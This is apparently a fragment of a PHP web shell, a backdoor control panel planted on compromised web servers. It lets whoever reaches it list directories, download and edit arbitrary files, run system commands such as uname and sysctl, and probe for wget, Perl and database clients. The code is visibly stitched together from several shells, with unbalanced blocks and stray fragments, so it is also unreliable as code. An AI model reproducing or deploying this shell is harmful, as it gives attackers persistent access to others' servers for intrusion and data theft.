echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . chr($j) . ':/\'; document.reqs.submit();"> ' . chr($j) . '<a/>';
}
}
echo "</td></tr>";
}
echo "<tr><td>OS: " . @php_uname() . "</td></tr>\n<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
for ($i = 0; $i < count($dire); $i++) {
$link = $dir . $dire[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td><td>dir</td><td></td><td>' . perms($link) . '</td></tr>';
}
for ($i = 0; $i < count($files); $i++) {
$linkfile = $dir . $files[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();">' . $files[$i] . '</a><br></td><td>file</td><td>' . view_size(filesize($linkfile)) . '</td>
<td>' . perms($linkfile) . '</td>
<td>
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Download">D</a>
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Edit">E</a></tr>';
}
echo "</table>";
}
}
}
if ('' == ($df = @ini_get('disable_functions'))) {
echo "<font color=green>NONE</font></b>";
} else {
echo "<font color=red>{$df}</font></b>";
}
$free = @diskfreespace($dir);
if (!$free) {
$free = 0;
}
$all = @disk_total_space($dir);
if (!$all) {
$all = 0;
}
$used = $all - $free;
$used_percent = @round(100 / ($all / $free), 2);
echo "<br>" . ws(2) . "HDD Free : <b>" . view_size($free) . "</b> HDD Total : <b>" . view_size($all) . "</b>";
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>';
echo $font;
if (!$windows) {
echo '<font color=blue><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
$uname = ex('uname -a');
echo !empty($uname) ? ws(3) . @substr($uname, 0, 120) . "<br>" : ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
if (!$safe_mode) {
$bsd1 = ex('sysctl -n kern.ostype');
$bsd2 = ex('sysctl -n kern.osrelease');
$lin1 = ex('sysctl -n kernel.ostype');
$lin2 = ex('sysctl -n kernel.osrelease');
function getinfo()
{
$info = '';
$info .= '[~]Versione PHP: ' . phpversion() . '<br />';
$info .= '[~]Server: ' . $_SERVER['HTTP_HOST'] . '<br />';
$info .= '[~]Indirizzo IP: ' . $_SERVER['SERVER_ADDR'] . '<br />';
$info .= '[~]Software: ' . $_SERVER['SERVER_SOFTWARE'] . '<br />';
$info .= '[~]Charset: ' . $_SERVER['HTTP_ACCEPT_CHARSET'] . '<br />';
$info .= ini_get('safe_mode') == 0 ? '[~]Safe Mode: <font color="#00FF33">OFF</font><br />' : '[~]Safe Mode: <font color="#FF3300">OFF</font><br />';
$info .= ini_get('magic_quotes_gpc') == 0 ? '[~]Magic Quotes: <font color="#00FF33">OFF</font><br />' : '[~]Magic Quotes: <font color="#FF3300">ON</font><br />';
if (is_callable("disk_free_space")) {
$d = realpath(".");
$free = disk_free_space($d);
$total = disk_total_space($d);
if ($free === FALSE || $free < 0) {
$free = 0;
}
if ($total === FALSE || $total < 0) {
$total = 0;
}
$used = $total - $free;
$info .= "[~]Free space: " . view_size($free) . "/" . view_size($total) . "<br />";
}
return $info;
}
echo "..." . substr($u, strlen($u) - 40, 40);
} else {
echo $u;
}
?>
</b></font></td>
<td width="15%" >PostgreSQL: <?php
echo postgresql();
?>
</td>
<td width="15%" >WGet: <?php
echo testwget();
?>
</td>
<td width="25%" >Free space: <?php
echo view_size(diskfreespace(getcwd()));
?>
</td>
</tr>
<tr>
<td width="35%" >User: <font size=2 color=#ff4500><b><?php
echo getuser();
?>
</b></font></td>
<td width="15%" >MSSQL: <?php
echo testmssql();
?>
</td>
<td width="15%" >Perl: <?php
echo testperl();
?>
exit("<html><head></head><body>\n<form action='" . basename($PHP_SELF) . "' name='frmmentalback' id='frmmentalback' method='post'>\n\n<input type='hidden' name='_lh' value='KSIAN.deh.GW'>\n\n</form><script type='text/javascript'>document.frmmentalback.submit();alert('Advanced Editor Disabled..!!!');</script></body></html>");
}
}
// === MAIN
$buffer_TEXT = '';
if (!is_readable($fileconfig) or is_dir($fileconfig)) {
if (file_exists($fileconfig)) {
$buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($fileconfig) . ")!</b>";
} else {
$buffer_TEXT .= "<b>File does not exists.</b>";
}
} else {
$styledisplay = ' style="display:none"';
$showpostn = false;
$iserr = false;
$t_head = "<b>File: " . CONFIG_FILE . " (" . view_size(filesize($fileconfig));
$t_head .= ") attrib: " . view_perms_color($fileconfig) . "</b>";
$t_head .= "<br>You're logged with IP: <b class='g'>" . get_real_ip() . "</b><br><hr width=\"800\">";
$buffer_TEXT .= $t_head;
if (isset($_GET["mode"])) {
if ($_GET["mode"] == "editor") {
$buffer_TEXT .= "<p><b><span id='nv1' style='background-color:#840000;color:yellow;'> Editor </span></p>";
}
}
if (isset($_POST['submit'])) {
if ($task == 'editor') {
$edt = $_POST["edit_text"];
$fp = fopen($fileconfig, "w");
if (!$fp) {
$buffer_TEXT .= "<b class='a'>Can't write to file!</b>";
} else {
